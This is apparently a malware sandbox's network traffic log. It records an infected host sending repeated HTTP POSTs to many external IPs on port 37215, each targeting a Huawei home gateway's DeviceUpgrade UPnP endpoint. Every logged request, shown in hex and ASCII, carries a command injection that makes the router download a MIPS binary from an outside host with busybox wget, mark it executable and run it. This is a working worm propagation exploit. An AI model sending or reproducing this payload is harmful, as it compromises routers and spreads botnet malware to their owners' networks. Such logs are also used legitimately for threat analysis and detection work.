75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.1453772197.219.160.10937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091728926 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.143974441.82.238.20637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091743946 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.143769641.194.169.637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091789007 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.1449686156.200.181.22937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091813087 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.1441152156.18.202.16237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091846943 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.1439814156.231.38.10137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091870070 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.145905841.164.83.14237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091900110 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.1453730197.139.243.13537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091932058 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.1440528197.222.221.18937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091960907 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.1458928156.238.129.16537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091972113 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.1456994197.197.243.18337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.091995001 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
